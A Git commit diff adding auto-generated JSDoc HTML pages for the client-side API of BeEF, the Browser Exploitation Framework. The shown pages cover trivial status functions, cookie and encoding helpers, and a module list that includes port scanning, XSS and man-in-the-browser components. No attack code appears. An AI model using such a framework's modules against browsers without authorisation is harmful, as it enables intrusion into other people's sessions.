Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated JSDoc html files to host on Github Pages

Browse Source
This commit is contained in:
Grant Burgess
2020-01-02 16:33:14 +10:00
parent 53f2529718
commit e9636599ac
85 changed files with 87280 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

567
docs/BeefJS.html Normal file
View File

@@ -0,0 +1,567 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: BeefJS</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: BeefJS</h1>
<section>
<header>
<h2>BeefJS</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Register the BeEF JS on the window object.</p></div>
<h5 class="subsection-title">Properties:</h5>
<table class="props">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>version</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"><p>BeEf Version</p></td>
</tr>
<tr>
<td class="name"><code>pageIsLoaded</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"><p>This gets set to true during window.onload(). It's a useful hack when messing with document.write().</p></td>
</tr>
<tr>
<td class="name"><code>onpopstate</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing functions to be executed by the window.onpopstate() method.</p></td>
</tr>
<tr>
<td class="name"><code>onclose</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing functions to be executed by the window.onclose() method.</p></td>
</tr>
<tr>
<td class="name"><code>commands</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing functions to be executed by Beef.</p></td>
</tr>
<tr>
<td class="name"><code>components</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing all the BeEF JS components.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".debug"><span class="type-signature">(static) </span>debug<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Adds a function to display debug messages (wraps console.log())</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line40">line 40</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".execute"><span class="type-signature">(static) </span>execute<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Adds a function to execute.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line62">line 62</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".regCmp"><span class="type-signature">(static) </span>regCmp<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Registers a component in BeEF JS.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line77">line 77</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

92
docs/are.js.html Normal file
View File

@@ -0,0 +1,92 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: are.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: are.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* A series of functions that handle statuses, returns a number based on the function called.
* @namespace beef.are
*/
beef.are = {
/**
* A function for handling a success status
* @memberof beef.are
* @method status_success
* @return {number} 1
*/
status_success: function(){
return 1;
},
/**
* A function for handling an unknown status
* @memberof beef.are
* @method status_unknown
* @return {number} 0
*/
status_unknown: function(){
return 0;
},
/**
* A function for handling an error status
* @memberof beef.are
* @method status_error
* @return {number} -1
*/
status_error: function(){
return -1;
}
};
beef.regCmp("beef.are");
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

466
docs/beef.are.html Normal file
View File

@@ -0,0 +1,466 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: are</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: are</h1>
<section>
<header>
<h2>are</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>A series of functions that handle statuses, returns a number based on the function called.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".status_error"><span class="type-signature">(static) </span>status_error<span class="signature">()</span><span class="type-signature"> &rarr; {number}</span></h4>
<div class="description">
<p>A function for handling an error status</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line31">line 31</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>-1</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">number</span>
</dd>
</dl>
<h4 class="name" id=".status_success"><span class="type-signature">(static) </span>status_success<span class="signature">()</span><span class="type-signature"> &rarr; {number}</span></h4>
<div class="description">
<p>A function for handling a success status</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line13">line 13</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>1</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">number</span>
</dd>
</dl>
<h4 class="name" id=".status_unknown"><span class="type-signature">(static) </span>status_unknown<span class="signature">()</span><span class="type-signature"> &rarr; {number}</span></h4>
<div class="description">
<p>A function for handling an unknown status</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line22">line 22</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>0</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">number</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

643
docs/beef.browser.cookie.html Normal file
View File

@@ -0,0 +1,643 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: cookie</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: cookie</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.browser.html">.browser</a>.</span>cookie</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides fuctions for working with cookies.
Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
Original author unknown.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".deleteCookie"><span class="type-signature">(static) </span>deleteCookie<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line66">line 66</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getCookie"><span class="type-signature">(static) </span>getCookie<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line35">line 35</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasPersistentCookies"><span class="type-signature">(static) </span>hasPersistentCookies<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line111">line 111</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasSessionCookies"><span class="type-signature">(static) </span>hasSessionCookies<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line102">line 102</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".setCookie"><span class="type-signature">(static) </span>setCookie<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".veganLol"><span class="type-signature">(static) </span>veganLol<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line75">line 75</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

30093
docs/beef.browser.html Normal file
View File

File diff suppressed because it is too large Load Diff

223
docs/beef.browser.popup.html Normal file
View File

@@ -0,0 +1,223 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: popup</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: popup</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.browser.html">.browser</a>.</span>popup</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides fuctions for working with cookies.
Several functions adopted from http://davidwalsh.name/popup-block-javascript
Original author unknown.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_popup.js.html">browser/popup.js</a>, <a href="browser_popup.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".blocker_enabled"><span class="type-signature">(static) </span>blocker_enabled<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_popup.js.html">browser/popup.js</a>, <a href="browser_popup.js.html#line15">line 15</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

3688
docs/beef.dom.html Normal file
View File

File diff suppressed because it is too large Load Diff

740
docs/beef.encode.base64.html Normal file
View File

@@ -0,0 +1,740 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: base64</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: base64</h1>
<section>
<header>
<h2>base64</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line11">line 11</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".decode"><span class="type-signature">(static) </span>decode<span class="signature">(input)</span><span class="type-signature"> &rarr; {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>input</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line65">line 65</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".encode"><span class="type-signature">(static) </span>encode<span class="signature">(input)</span><span class="type-signature"> &rarr; {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>input</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line23">line 23</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".utf8_decode"><span class="type-signature">(static) </span>utf8_decode<span class="signature">(utftext)</span><span class="type-signature"> &rarr; {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>utftext</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line140">line 140</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".utf8_encode"><span class="type-signature">(static) </span>utf8_encode<span class="signature">(string)</span><span class="type-signature"> &rarr; {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>string</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line110">line 110</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

392
docs/beef.encode.json.html Normal file
View File

@@ -0,0 +1,392 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: json</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: json</h1>
<section>
<header>
<h2>json</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_json.js.html">encode/json.js</a>, <a href="encode_json.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".quoteString"><span class="type-signature">(static) </span>quoteString<span class="signature">(string)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>string</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_json.js.html">encode/json.js</a>, <a href="encode_json.js.html#line110">line 110</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".stringify"><span class="type-signature">(static) </span>stringify<span class="signature">(o)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>o</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_json.js.html">encode/json.js</a>, <a href="encode_json.js.html#line17">line 17</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
